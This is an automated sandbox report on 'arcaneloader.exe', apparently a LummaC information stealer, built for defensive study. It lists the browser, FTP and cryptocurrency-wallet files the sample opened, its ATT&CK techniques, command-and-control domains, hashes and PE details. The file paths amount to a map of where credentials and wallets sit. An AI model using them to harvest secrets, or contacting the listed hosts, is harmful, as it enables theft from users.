                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                  Source: C:\Users\user\Desktop\arcaneloader.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                  Source: Yara matchFile source: 00000003.00000003.2265617650.000000000327A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: arcaneloader.exe PID: 280, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: arcaneloader.exe PID: 280, type: MEMORYSTR
                  Source: Yara matchFile source: 3.2.arcaneloader.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.arcaneloader.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2347732117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2147698291.000000000349E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  211
                  Process Injection
                  11
                  Virtualization/Sandbox Evasion
                  2
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services1
                  Screen Capture
                  21
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading
                  211
                  Process Injection
                  LSASS Memory141
                  Security Software Discovery
                  Remote Desktop Protocol1
                  Archive Collected Data
                  2
                  Non-Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                  Deobfuscate/Decode Files or Information
                  Security Account Manager11
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin Shares41
                  Data from Local System
                  113
                  Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                  Obfuscated Files or Information
                  NTDS1
                  Process Discovery
                  Distributed Component Object Model2
                  Clipboard Data
                  Protocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Software Packing
                  LSA Secrets11
                  File and Directory Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials33
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  arcaneloader.exe42%ReversingLabsWin32.Packed.Generic
                  arcaneloader.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://frogs-severz.sbs/apiS0%Avira URL Cloudsafe
                  https://frogs-severz.sbs/api0%Avira URL Cloudsafe
                  https://frogs-severz.sbs/mB0%Avira URL Cloudsafe
                  https://frogs-severz.sbs/cl0%Avira URL Cloudsafe
                  https://frogs-severz.s0%Avira URL Cloudsafe
                  https://frogs-severz.sbs/apikB0%Avira URL Cloudsafe
                  fumblingactor.cyou0%Avira URL Cloudsafe
                  https://frogs-severz.sbs:443/apial0%Avira URL Cloudsafe
                  https://frogs-severz.sbs/apiiF0%Avira URL Cloudsafe
                  https://frogs-severz.sbs/0%Avira URL Cloudsafe
                  https://frogs-severz.sbs/apigoN0T0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  frogs-severz.sbs
                  172.67.155.47
                  truefalse
                    high
                    fumblingactor.cyou
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://frogs-severz.sbs/apitrue
                      • Avira URL Cloud: safe
                      unknown
                      fumblingactor.cyoutrue
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://frogs-severz.sbs/clarcaneloader.exe, 00000003.00000003.2286841337.000000000326C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/chrome_newtabarcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://frogs-severz.sbs/apikBarcaneloader.exe, 00000003.00000003.2195949369.0000000003270000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://duckduckgo.com/ac/?q=arcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoarcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.arcaneloader.exe, 00000003.00000003.2241058749.00000000057B5000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://frogs-severz.sbs/apiSarcaneloader.exe, 00000003.00000003.2286841337.000000000326C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiarcaneloader.exe, 00000003.00000003.2241058749.00000000057B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=arcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://crl.rootca1.amazontrust.com/rootca1.crl0arcaneloader.exe, 00000003.00000003.2239123754.00000000057CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=arcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://frogs-severz.sbs/mBarcaneloader.exe, 00000003.00000003.2195949369.0000000003277000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://ocsp.rootca1.amazontrust.com0:arcaneloader.exe, 00000003.00000003.2239123754.00000000057CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.ecosia.org/newtab/arcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgarcaneloader.exe, 00000003.00000003.2241058749.00000000057B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://frogs-severz.sbs/apiiFarcaneloader.exe, 00000003.00000003.2262709670.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2238399885.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2239078589.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2238614584.00000000057AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brarcaneloader.exe, 00000003.00000003.2240657828.00000000058C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_arcaneloader.exe, 00000003.00000003.2241058749.00000000057B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://frogs-severz.sbs:443/apialarcaneloader.exe, 00000003.00000002.2349286243.00000000031F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://ac.ecosia.org/autocomplete?q=arcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://frogs-severz.sarcaneloader.exe, 00000003.00000003.2286689845.00000000057AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://frogs-severz.sbs/arcaneloader.exe, 00000003.00000003.2347314866.000000000326A000.00000004.00000020.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2239078589.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2238614584.00000000057AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgarcaneloader.exe, 00000003.00000003.2241058749.00000000057B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://frogs-severz.sbs/apigoN0Tarcaneloader.exe, 00000003.00000003.2238399885.00000000057B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://x1.c.lencr.org/0arcaneloader.exe, 00000003.00000003.2239123754.00000000057CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://x1.i.lencr.org/0arcaneloader.exe, 00000003.00000003.2239123754.00000000057CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searcharcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3arcaneloader.exe, 00000003.00000003.2241058749.00000000057B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?arcaneloader.exe, 00000003.00000003.2239123754.00000000057CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://support.mozilla.org/products/firefoxgro.allarcaneloader.exe, 00000003.00000003.2240657828.00000000058C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=arcaneloader.exe, 00000003.00000003.2196309451.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, arcaneloader.exe, 00000003.00000003.2196383157.00000000057EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.mozilla.orarcaneloader.exe, 00000003.00000003.2240520662.00000000057C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaarcaneloader.exe, 00000003.00000003.2241058749.00000000057B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      172.67.155.47
                                                                      frogs-severz.sbsUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1561494
                                                                      Start date and time:2024-11-23 15:02:09 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 4m 49s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:7
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:arcaneloader.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@4/0@2/1
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 91%
                                                                      • Number of executed functions: 46
                                                                      • Number of non-executed functions: 111
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: arcaneloader.exe
                                                                      TimeTypeDescription
                                                                      09:03:02API Interceptor9x Sleep call for process: arcaneloader.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      172.67.155.47xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        frogs-severz.sbsxLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.155.47
                                                                        injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.88.250
                                                                        SystemCoreHelper.dllGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.88.250
                                                                        b.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.88.250
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 193.143.1.19
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSunturnedHack.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                        • 104.26.13.205
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.70.128
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.162.84
                                                                        xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.155.47
                                                                        Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.198.61
                                                                        Aura.exeGet hashmaliciousUnknownBrowse
                                                                        • 104.21.33.116
                                                                        injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.88.250
                                                                        injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.44.93
                                                                        injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 104.21.33.116
                                                                        loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.162.84
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousUnknownBrowse
                                                                        • 172.67.155.47
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.155.47
                                                                        xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.155.47
                                                                        Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.155.47
                                                                        Aura.exeGet hashmaliciousUnknownBrowse
                                                                        • 172.67.155.47
                                                                        injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.155.47
                                                                        injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.155.47
                                                                        injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.155.47
                                                                        loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.155.47
                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 172.67.155.47
                                                                        No context
                                                                        No created / dropped files found
                                                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.736219294397836
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:arcaneloader.exe
                                                                        File size:507'392 bytes
                                                                        MD5:f6af7a6808f0e831fed6566c54b1e94e
                                                                        SHA1:c892db08342003ea729c89e4b763448999eb4f5a
                                                                        SHA256:131415b711a7dbe49af20022577ad51c271d75175e32547a8107a56d7462f1d7
                                                                        SHA512:ab42cb1b69028a5a3788aa82c526a4fd7278dd0c1859bd968b4c0594a6a8c940a68299dfc375d4288def9e0e62c90a3939b70903057ebe1adda2d6d58db462a5
                                                                        SSDEEP:6144:SJLDwnXc+nZ5tc5tpJgurXjjmNcEIwyg8XIcwgSzBC05fnP7UXnVgWXdqPmtLO4D:SJB+nneDgkXFEIJ0zzpfnQXlXlNeBsJ
                                                                        TLSH:F1B4F19E73A3D0B3E962183502D49B75092F7E700F24A9FB57540F692F3A6C28932E57
                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...t.@g............................pX............@.......................... .......~....@.................................T...<..
                                                                        Icon Hash:0d4f96872b517131
                                                                        Entrypoint:0x415870
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows cui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x6740AA74 [Fri Nov 22 15:59:48 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:6
                                                                        OS Version Minor:0
                                                                        File Version Major:6
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:6
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:887797384d81c493a9d8ee55dad3b2e1
                                                                        Instruction
                                                                        call 00007FE1D0F2155Ah
                                                                        jmp 00007FE1D0F213BDh
                                                                        mov ecx, dword ptr [0042B5F0h]
                                                                        push esi
                                                                        push edi
                                                                        mov edi, BB40E64Eh
                                                                        mov esi, FFFF0000h
                                                                        cmp ecx, edi
                                                                        je 00007FE1D0F21556h
                                                                        test esi, ecx
                                                                        jne 00007FE1D0F21578h
                                                                        call 00007FE1D0F21581h
                                                                        mov ecx, eax
                                                                        cmp ecx, edi
                                                                        jne 00007FE1D0F21559h
                                                                        mov ecx, BB40E64Fh
                                                                        jmp 00007FE1D0F21560h
                                                                        test esi, ecx
                                                                        jne 00007FE1D0F2155Ch
                                                                        or eax, 00004711h
                                                                        shl eax, 10h
                                                                        or ecx, eax
                                                                        mov dword ptr [0042B5F0h], ecx
                                                                        not ecx
                                                                        pop edi
                                                                        mov dword ptr [0042B5ECh], ecx
                                                                        pop esi
                                                                        ret
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        sub esp, 14h
                                                                        and dword ptr [ebp-0Ch], 00000000h
                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                        and dword ptr [ebp-08h], 00000000h
                                                                        push eax
                                                                        call dword ptr [0042946Ch]
                                                                        mov eax, dword ptr [ebp-08h]
                                                                        xor eax, dword ptr [ebp-0Ch]
                                                                        mov dword ptr [ebp-04h], eax
                                                                        call dword ptr [00429430h]
                                                                        xor dword ptr [ebp-04h], eax
                                                                        call dword ptr [0042942Ch]
                                                                        xor dword ptr [ebp-04h], eax
                                                                        lea eax, dword ptr [ebp-14h]
                                                                        push eax
                                                                        call dword ptr [004294A8h]
                                                                        mov eax, dword ptr [ebp-10h]
                                                                        lea ecx, dword ptr [ebp-04h]
                                                                        xor eax, dword ptr [ebp-14h]
                                                                        xor eax, dword ptr [ebp-04h]
                                                                        xor eax, ecx
                                                                        leave
                                                                        ret
                                                                        mov eax, 00004000h
                                                                        ret
                                                                        push 0042C970h
                                                                        call dword ptr [00429488h]
                                                                        ret
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        int3
                                                                        mov al, 01h
                                                                        ret
                                                                        push 00030000h
                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x292540x3c.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x1de8.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x2f0000x1400.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x237c00xc0.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x293c80x138.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x2169a0x2180002aff72e65eaf052f891170e28598361False0.550606343283582data6.737058354414408IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x230000x72640x740091e5fdecc510d2c4e72b1b50db3c2501False0.40641837284482757data4.769873714467996IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x2b0000x20680x1000f9b2b4b1f63578440eedd0ace5ac94f1False0.484375OpenPGP Secret Key5.090094544660231IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                        .00cfg0x2e0000x80x200160c8b290b62e5e566d05ce3bec76423False0.03125data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0x2f0000x14000x140029fb367912ce622b91120c5cffd84495False0.81953125data6.557860970753822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                        .coS0x310000x4e8000x4e80001f8ec1bd8aac06321dfaa0fd7af4910False1.0003296675955413data7.999487492637194IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
